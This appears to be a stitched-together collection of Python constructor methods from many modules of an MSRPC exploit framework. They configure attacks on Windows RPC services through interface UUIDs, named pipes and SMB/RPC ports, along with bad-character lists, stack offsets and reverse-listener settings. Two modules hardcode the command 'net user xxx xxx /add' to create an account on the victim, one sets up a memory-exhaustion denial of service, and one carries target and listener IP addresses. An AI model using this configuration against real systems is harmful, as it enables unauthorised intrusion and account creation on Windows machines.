def __init__(self): msrpcexploit.__init__(self) self.name=NAME self.host="" self.user="" self.password="" self.knowledgestring="PrintProviders" self.UUID="12345678-1234-abcd-ef00-0123456789ab" self.uuidversion="1.0" self.namedpipe="\\spoolss" self.response=1 self.parseResponse=self.parse_packet self.autoversion=True #always true, essentially :> self.buildConnectionList=self.buildTCPConnectionList self.port=445 self.needsNoShellcode=True self.targetfunction=0 self.getcontexthandle=self.get_pp_size #here's where we set the size to be something larger than zero #when we're doing it for real self.datasize=0 self.sleeptime=0 self.nouniresult=[] return
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.version = 0 self.badstring = '\0' self.subesp = 2000 self.myDCE = None
def __init__(self): msrpcexploit.__init__(self) self.version = 0 self.badstring = "\x00" self.UUID = u"12345678-1234-abcd-ef00-0123456789ab" self.uuidversion = u"1.0" self.targetfunction = 0 # EnumPrintersW self.name = NAME
def __init__(self): msrpcexploit.__init__(self) self.version = 0 self.badstring = "\x00\\/.:$" self.UUID = u"20610036-fa22-11cf-9823-00a0c911e5df" self.uuidversion = u"1.0" self.targetfunction = 0xc self.name = NAME
def __init__(self): msrpcexploit.__init__(self) self.version=0 self.badstring='\x00\xff' self.UUID='12345678-1234-abcd-ef00-0123456789ab' self.uuidversion='1.0' self.targetfunction=0 # EnumPrintersW self.name=NAME return
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.setInfo(DESCRIPTION) self.version = 0 self.badstring = '\0' self.UUID = u'dc246bf0-7a7a-11ce-9f88-00805fe43838' self.uuidversion = u'1.0' self.targetfunction = 1
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.UUID = u'50abc2a4-574d-40b3-9d66-ee4fd5fba076' self.uuidversion = u'5.0' self.targetfunction = 1 self.autoversion = 0 self.subesp = 2000 self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self): msrpcexploit.__init__(self) self.version = 0 self.badstring = '\0' self.UUID = u'12345678-1234-abcd-ef00-0123456789ab' self.uuidversion = u'1.0' self.targetfunction = 0xa # EnumPrinterDriversW self.name = NAME self.subesp = 1000 self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self): msrpcexploit.__init__(self) self.version = 0 self.badstring = '\0' self.UUID = u'25288888-bd5b-11d1-9d53-0080c83a5c2c' self.uuidversion = u'1.0' self.targetfunction = 0 self.name = NAME self.port = 3628 self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.port = 139 self.host = '' self.version = 0 self.badstring = '' #no bad chars self.UUID = u'8d9f4e40-a03d-11ce-8f69-08003e30051b' self.namedpipe = u'browser' self.autoversion = 1 self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self): msrpcexploit.__init__(self) self.version = 0 self.badstring = '\0\xff' self.UUID = '12345678-1234-abcd-ef00-0123456789ab' self.uuidversion = '1.0' self.targetfunction = 0x0 # EnumPrintersW self.name = NAME self.subesp = 0 self.listenerArgsDict['fromcreatethread'] = 0 #force it to 0 return
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.version = 0 self.badstring = '\0\xff' self.UUID = u'e67ab081-9844-3521-9d32-834f038001c0' self.uuidversion = u'1.0' self.targetfunction = 9 #NwrOpenEnumNdsSubTrees_Any self.autoversion = 1 self.subesp = 3000 self.listenerArgsDict['fromcreatethread']=1
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.UUID = u'ed6ee250-e0d1-11cf-925a-00aa00c006c1' self.uuidversion = u'1.1' self.targetfunction = 1 self.autoversion = 1 self.subesp = 2000 self.port = 0 self.command = 'net user xxx xxx /add' self.needsNoShellcode = 1
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.port = 135 self.host = '' self.version = 0 self.badstring = '\x00\xff' self.UUID = u'4d9f4ab8-7d1c-11cf-861e-0020af6e7c57' self.uuidversion = u'0.0' self.targetfunction = 0 self.listenerArgsDict['fromcreatethread'] = 1 self.autoversion = 1
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.port = 139 self.host = '' self.version = 0 self.badstring = '\x00\xff' self.UUID = u'2f5f3220-c126-1076-b549-074d078619da' self.uuidversion = u'1.2' self.targetfunction = 0xc self.autoversion = 1 self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.port = 139 self.host = '' self.version = 0 self.badstring = '\x00' self.UUID = u'6bffd098-a112-3610-9833-46c3f87e345a' self.uuidversion = u'1.0' self.targetfunction = -1 self.listenerArgsDict['fromcreatethread'] = 1 self.autoversion = 1 self.subesp = 2000
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.port = 139 self.host = '' self.version = 0 self.badstring = '\x00\xff' self.UUID = u'd3fbb514-0e3b-11cb-8fad-08002b1d29c3' self.uuidversion = u'1.0' self.targetfunction = 0 self.namedpipe = 'locator' self.autoversion = 1 self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self): msrpcexploit.__init__(self) self.version = 0 self.badstring = '\x00\xff' self.UUID = u'6bffd098-a112-3610-9833-46c3f87e345a' self.uuidversion = u'1.0' self.targetfunction = 22 #NetrJoinDomain2 self.name = NAME self.domain = 'FOOBAR' self.controller = 'DC-1' self.usefakedc = 0 self.timeout = 10.0 #ten second timeout for the fake NBNS server self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.UUID = 'ed6ee250-e0d1-11cf-925a-00aa00c006c1' self.uuidversion = '1.1' self.targetfunction = 1 self.autoversion = 1 #self.listenerArgsDict['fromcreatethread']=1 self.subesp = 2000 self.port = 0 self.command = 'net user xxx xxx /add' self.needsNoShellcode = 1 return
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.port = 139 self.host = '' self.version = 0 self.badstring = '\x00\xff\\/.:$' self.UUID = u'3919286a-b10c-11d0-9ba8-00c04fd92ef5' self.uuidversion = u'0.0' self.targetfunction = 0x9 self.autoversion = 1 self.subesp = 3000 self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.version = 0 self.badstring = "\x00\\/.:$" self.UUID = u"a4f1db00-ca47-1067-b31e-00dd010662da" self.uuidversion = u"1.0" self.targetfunction = 5 self.autoversion = 1 self.version = 1 self.sleeptime = 1 self.buildConnectionList = self.buildTCPConnectionList self.run = self.run_exhaust_memory self.needsNoShellcode = 1
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.version = 0 self.badstring = '\0\xff' self.searchbadstring = '\0' self.UUID = u'4b324fc8-1670-01d3-1278-5a47bf6ee188' self.uuidversion = u'3.0' self.targetfunction = 0x1f self.autoversion = 1 self.subesp = 3000 self.sleeptime = 4 self.namedpipe = '\\browser' self.buildConnectionList = self.buildTCPConnectionList
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.version = 0 self.badstring = '\0\xff' self.searchbadstring = '\0' self.UUID = u'6bffd098-a112-3610-9833-46c3f87e345a' self.uuidversion = u'1.0' self.targetfunction = 0x14 self.autoversion = 1 self.sleeptime = 4 self.port = 445 self.namedpipe = '\\wkssvc' self.buildConnectionList = self.buildTCPConnectionList self.needsNoShellcode = 1
def __init__(self): msrpcexploit.__init__(self) self.version = 0 self.badstring = "\x00\\/.:$" self.UUID = u"2f5f6520-ca46-1067-b319-00dd010662da" self.uuidversion = u"1.0" self.targetfunction = 0x1 self.name = NAME self.startservice = self.StartTapiSrvService self.getcontexthandle = self.getContextHandle self.port = 445 self.forceauth = 1 self.object = self.UUID self.context = "" self.runlocalhost = self.mylocalhost self.autoversion = 1 #we can now
def __init__(self): msrpcexploit.__init__(self) self.name = NAME self.covertness = 0 self.port = 0 self.host = "192.168.0.6" self.localhost = "192.168.0.2" self.localport = 5555 self.version = 0 self.badstring = "\x00\\" #/.:$"# \\/.:$" self.UUID = u"8d9f4e40-a03d-11ce-8f69-08003e30051b" self.uuidversion = u"1.0" self.targetfunction = 10 self.autoversion = 1 self.response = 1 self.memorysize = 0x00f0ff10 self.sleeptime = 10
def __init__(self): msrpcexploit.__init__(self) self.name=NAME self.version=0 self.badstring='\0\xff' self.searchbadstring='\0' self.UUID='4b324fc8-1670-01d3-1278-5a47bf6ee188' self.uuidversion='3.0' self.targetfunction=0x1f self.autoversion=1 self.subesp=1000 self.sleeptime=4 self.port=445 self.namedpipe='\\browser' self.buildConnectionList=self.buildTCPConnectionList self.setSubVersions() #automatically sets some variables for some common versions/languages return
def __init__(self): msrpcexploit.__init__(self) self.setPort(135) self.setHost("") self.name=NAME self.version=0 #MGMT UUID self.UUID="afa8bd80-7d8a-11c9-bef4-08002b102989" self.uuidversion="1.0" self.targetfunction=0 self.response=1 self.needsNoShellcode=1 #we don't need shellcode here self.autoversion=1 self.namedpipe="\\browser" self.loadDocumentationFile() self.sleeptime=0 return